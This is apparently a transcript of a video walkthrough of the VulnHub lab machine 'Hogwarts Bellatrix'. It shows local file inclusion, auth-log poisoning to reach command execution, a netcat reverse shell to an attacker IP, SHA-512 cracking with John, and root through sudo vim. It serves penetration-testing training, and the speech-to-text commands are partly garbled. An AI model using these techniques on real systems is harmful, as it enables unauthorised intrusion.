Yo, what's going on, guys? In this video, we're going to be doing Hogwarts Bellatrix from VulnHub. I rate this box about a solid intermediate. Overall, pretty fun box, and yeah, hope you guys enjoy. Alright, so to get started, I'm actually going to be opening my terminals here. Let me just split my terminals. Alright, so first I'm going to start a net discover minus r 10.0.0.1.1/24/IET0. This is going to find the IP address of the box. Here we do get an IP address 10.0.0.233. So first I'm going to run an mmap scan on this box, minus sc, minus sv to enumerate the versions. We'll scan all ports on that machine. I'm going to do simple banner grab, so I don't have to wait for the box to load or for the mmap scan to finish. We do have port 80 open. And we visit this and we get this. Looking at the mmap scans, we do have open or port 22 for open SSH, and we do have port 80 as our Apache web server, right? Here, if we do Control U to check the source code, right here we do get a clue, and we do have a PHP directory, right, or .php directory. Here, this is, if you don't know what this piece of code is, it's pretty much basically vulnerable to local file inclusion. So here what we're going to do is actually visit, if you see it right here, it does show .php, so I'm just going to be copying this right here. So here we can just do slash that, and then we can just do question mark. And for this, since this is specified file right here, we actually need to put file right there too. So we're going to do file. So question mark file equals /etc, or is equal to /etc/password. And if you do that, do Control U, you do see that we outputted the /etc password, right? Alright, so one thing I actually did want to show you guys is a source that I used to figure out this box, which is right here. So looking at this, we know this is an exploit that suffers from local file inclusion. And we can check the var log auth log. So what if we can actually visit that, right? So let's try to visit our auth log, and we do get an auth log here, right? So looking at this right here, it does show us that we can actually get code execution by executing SSH or PHP code, right, on our host, right? So what if we can let's try to do that real quick. So if we do read here, this should be recorded and shown inside the logs, and we can also let's see. Yeah, so basically it's just gonna get us code execution, right? So let's clear this. Let's try to get into our IP. So 10.0.0.233, right? 233. We can press enter. Let's search up SSH log. I probably spelled that wrong. PHP code execution. So here we go. Let's see if we can get a view of this right here. So it seems like this is exactly what I did. So we can do 10.0.0.233. And now if we look back over here, we do see that we have my IP address right there, 10.0.0.23. So let's see if we can actually get code execution. We can just do, or start by doing and. I did specify this, or it was specified as C. So we can do C is equal to ls. We do get code execution right here, right? So let's try to do ls minus la, or ls, yeah, minus la. We do get code execution down here, right? So now that means we can actually execute netcat. So right here, we're actually going to specify netcat minus c 10.0.0.23. Actually, we need to specify /bin/bash 10.0.0.23 on 4444. So let me start a listener. So we can do LNVP and we can do 4444. We can press enter. It doesn't seem like we got a connection. Let's try to change this to netcat probably. Ncat minus E. Let's do 10. Let's do this netcat. We'll do netcat 10.0.023 4444 minus E execute bin / bash. There we go. So we did actually specify netcat, the IP address, the port, and also it's going to execute bin bash, right? We do ID, and we are www data. So I'm going to spawn a TTY shell. Not sure why that's not loading, but we'll just spawn one of these right here. Alright, so let's just export the term equals x term. We can clear this, right? So we are under var www HTML. And here we actually did get a directory, which was just a hash. If you do, this is base64. So if you do decode this, it just comes out to secret, but this is just a simple directory, right? So let's see if we can go try and go under here, this directory. Right here we do get two files, secret.dic. If we try to cat this out, we do get this right here, which is a word list. I'm pretty sure we can use this to brute force. Let's try to cat this out right here. And we do get a hash rate. So for this to happen, we can actually just, actually I'll just go under my, I'll go under VulnHub. This was, let me remove -r Bella. So I'll mkdir into Bella. Okay, so here we do have a hash. I'm just going to touch hash.txt. We're going to, I'll vi into hash real quick, put that in. I quit this out. And we do have our hash there, right? So next I'm going to be using John as my go-to for cracking. Equals, we'll specify user share word list. rocku.txt, and we can specify our hash. And the reason I create two spaces here is because it doesn't let me tab, so I just create two spaces there so it tabs. We can press enter and show that this is a SHA-512, and this is gonna start cracking, right? Alright, so after some time, after it was done cracking, we do get a password as I hate Harry Potter. Let's see if we try that and see if it works. And we do have a password successful login, right? If we do ID, I usually like checking my IDs, but next I'll just try sudo -l. We do have vim here, so we can go to GTFO bins and view what we can execute as vim, right? So if we type in vim, we want to get a shell in here. So here we can actually do two ways here. This is going to be ran as sudo, so we can just type in sudo, press enter. Now we do ID. Now we should be root ls, and you can cat root.txt, right? Well, you guys, that's pretty much in the video. Overall, pretty good box, and yeah, hope you guys enjoy. Don't forget to like and subscribe, and I'll catch you guys in the next one. Peace.